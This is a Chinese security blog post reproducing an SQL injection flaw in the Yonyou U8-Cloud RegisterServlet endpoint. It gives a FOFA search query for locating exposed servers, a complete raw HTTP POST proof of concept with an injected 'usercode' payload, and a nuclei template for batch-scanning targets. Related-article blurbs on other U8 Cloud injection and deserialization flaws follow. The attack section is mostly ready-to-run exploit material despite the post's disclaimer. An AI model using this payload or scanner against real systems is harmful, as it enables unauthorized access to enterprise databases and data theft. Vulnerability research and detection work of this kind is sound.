漏洞复现--用友U8-cloud RegisterServlet SQL注入

最新推荐文章于 2024-05-31 10:52:23 发布
最新推荐文章于 2024-05-31 10:52:23 发布
阅读量877 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53003652/article/details/134400953
版权

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

一:漏洞描述

U8 cloud集中于企业内部管理管控,管理规范,高效,协同,透明。通过云模式,低成本,快速部署,即租即用帮助企业免除硬软件投入的快速 搭建企业管理架构。通过云服务连接,业务模式、服务模式的经营创新。该产品RegisterServlet处存在SQL注入

二:漏洞影响版本

用友U8-Cloud

三:网络空间测绘查询

fofa:
app="用友-U8-Cloud"
image.png

四:漏洞复现

image.png
访问/servlet/RegisterServlet
image.png
如上页面即可能存在漏洞
POC:

POST /servlet/RegisterServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

image.png
SQLMAP:
image.png

五:批量检测

id: yonyou-u8-cloud-RegisterServlet-sql

info:
  name: 用友u8-cloud RegisterServlet SQL注入
  author: rain
  severity: high
  description:
    用友U8 cloud的RegisterServlet接口对用户传入的参数未进行有效的过滤,攻击者可利用该漏洞进行sql注入。
  tags: [用友U8-Cloud, sql注入, 高危]
  metadata:
    fofa-query: app="用友-U8-Cloud"
http:
  - raw:
      - |-
        POST /servlet/RegisterServlet HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
        Connection: close
        Content-Length: 85
        Accept: */*
        Accept-Language: en
        Content-Type: application/x-www-form-urlencoded
        X-Forwarded-For: 127.0.0.1
        Accept-Encoding: gzip

        usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0-- 
     

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code==200 && contains(body_1, "e10adc3949ba59abbe56e057f20f883e")'

image.png

芝士土包鼠
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
用友U8 Cloud 多处反序列化RCE漏洞
0xSec
12-10 1611
用友U8 Cloud存在多处(TableInputOperServlet、LoginServlet、FileTransportServlet、CacheInvokeServlet、ActionHandlerServlet、ServletCommander、MxServlet 、MonitorServlet、LoggingConfigServlet、ClientRequestDispatch)反序列化漏洞,系统未将用户传入的序列化数据进行过滤就直接执行反序列化操作,最终造成服务器失陷
用友u8-cloud RegisterServlet SQL注入漏洞
fly夏天的博客
12-25 1202
用友U8 cloud是用友推出的企业上云数字化平台,该产品RegisterServlet接口处存在SQL注入漏洞,攻击者可通过该漏洞获取数据库权限。文章了该漏洞并提供了进一步利用的相关方案。并提供了官方的修方案。
用友u8-cloud RegisterServlet SQL注入
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
12-01 377
U8 Cloud是用友公司推出的企业上云数字化平台,为成长型和创新型企业提供全面的云ERP解决方案。该平台中存在一个安全漏洞,涉及RegisterServlet接口对用户输入参数缺乏有效过滤,可能导致SQL注入攻击。攻击者可通过此漏洞未经授权地访问数据库,造成潜在的信息泄露风险。建议尽快修漏洞,强化输入验证,提升系统安全性。
用友U8SMSProxy -SQL注入漏洞
zkaqlaoniao的博客
10-26 339
用友GRP-U8 R10政务管理软件是由用友政务公司基于云技术所推出的第十代政务产品。这款产品继承了用友R9、R9i、U8等行政事业版产品的各项优点,并融合了全国广大用户的最佳实践应用。它旨在为政府财政部门、社保部门、卫生部门、教育部门、民政部门、党务部门以及农村等政府及行政事业单位提供专业管理解决方案。该漏洞存在于U8SMSProxy,后端对begindate传参的数据值没有进行严格的过滤,从而导致SQL注入,攻击者可以利用该漏洞获取数据库敏感信息。直接copy进文件,打”*”号,sqlmap一把嗦。
用友 U8 SQL注入
众生度尽,方证菩提
08-19 158
子曰:“弟子入则孝,出则弟,谨而信,泛爱众,而亲仁。行有余力,则以学文。”
U8cloud系统ReportDetailDataQuery接口SQL注入漏洞分析
qq_42067124的博客
12-28 598
U8cloud系统ReportDetailDataQuery接口SQL注入漏洞分析
用友u8-ERP应用流程.doc
11-03
用友u8-ERP应用流程
用友U8-OA标准方案.docx
05-26
用友U8-OA标准方案
用友U8 cloud V1.0-自定义技术红皮书.pdf
02-16
用友U8 cloud V1.0-自定义技术红皮书
用友U8 cloud V1.0-公式技术红皮书.pdf
02-16
用友U8 cloud V1.0-公式技术红皮书
ERP用友U8培训手册-存货档案与物料清单.pptx
04-15
ERP用友U8培训手册-存货档案与物料清单
漏洞分析 | U8 Cloud ServiceDispatcher反序列化漏洞及补丁分析
m0_46699477的博客
11-04 1226
本文对 U8Cloud ServiceDispatcher 接口反序列化漏洞原理进行跟踪分析,讲述了该漏洞是如何被利用以及官方的修方式。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8252
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
【网络安全的神秘世界】docker搭建pikachu靶场
weixin_54750312的博客
05-31 198
再访问80端口,因为默认端口就是80,所以80可省略。可以通过下面命令进入pikachu网站根目录。虽然是404,但实际已经启动好了。点击红色部分,进行安装/初始化。制命令后,去kali安装。访问本地地址8080端口。
【网络安全的神秘世界】VsCode直连虚拟机
最新发布
weixin_54750312的博客
05-31 390
连接成功,回到原始vscode界面,可以点击打开文件夹。右击VScode中左下角的绿色区域,勾选远程主机。通过VsCode连接虚拟机,可以进行远程操作。打开远程资源管理器,点击+号,配置连接服务器。再次输入密码后,进入Linux文件夹。hostname:主机名,随便起。host:打开kali,用。User:虚拟机的用户名。
网络安全行为可控定义以及表内容简述
行云管家
05-28 325
在数字化快速发展的今天,网络安全已成为国家和企业不可或缺的防线。据统计,网络攻击事件频发,给全球经济带来了巨大损失。因此,确保网络安全行为可控显得尤为重要。今天我们来聊聊网络安全行为可控定义以及表内容。
【网络安全的神秘世界】使用vulhub搭建漏洞测试靶场
weixin_54750312的博客
05-31 188
Vulhub是一个基于docker和的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞变得更加简单,让安全研究者更加专注于漏洞原理本身。
信息安全法规和标准
m0_62207482的博客
05-28 929
自行建设韵味的政府网站不放在境外;39、据《计算机场地安全要求(GB/T9361-2011)》,计算机机房的安全等级分为 A:计算机系统运行中断后,会对国家安全、社会秩序、公共利益造成严重损害的对计算机机房的安全有严格的要求,有完善的计算机器机房安全措施 B级:计算机系统运行中断后,会对国家安全、社会秩序、公共利益造成较大损害的计算机机房的安全有较严格的要求,有较完善的计算机机房安全措施 C级: 不属于A、B级的情况,对计算机机房的安全有基本的要求,有基本的计算机机房安全措施。
用友u8 cloud 反序列化rce漏洞
12-05
用友U8 Cloud是一款企业级管理软件,但是近期被发存在反序列化远程命令执行(RCE)漏洞。要这个漏洞,首先需要一个能够触发反序列化的点,比如一个可控制的对象。接下来,我们可以构造一个恶意的序列化数据,然后将这个数据传递给U8 Cloud系统,让系统进行反序列化操作。当系统对这个数据进行反序列化时,就会触发我们植入的恶意代码,从而实远程命令执行。 为了更具体地说明这个过程,我们可以借助一个简单的例子来解释。假设我们构造了一个包含恶意命令的序列化数据,并将其发给U8 Cloud系统。系统在接收到这个数据后,会将其解析,然后执行其中的命令。这样一来,我们就成功地利用了反序列化漏洞来实远程命令执行。 当然,为了成功这个漏洞,还需要一些具体的技术细节和环境配置。需要了解U8 Cloud系统的结构和漏洞的具体利用方式,还可能需要使用特定的工具来构造恶意的序列化数据。在过程中,一定要格外小心,确保不会对受影响的系统造成损害。同时,及时向厂商反馈该漏洞,以便及时修和加强系统安全防护。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芝士土包鼠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值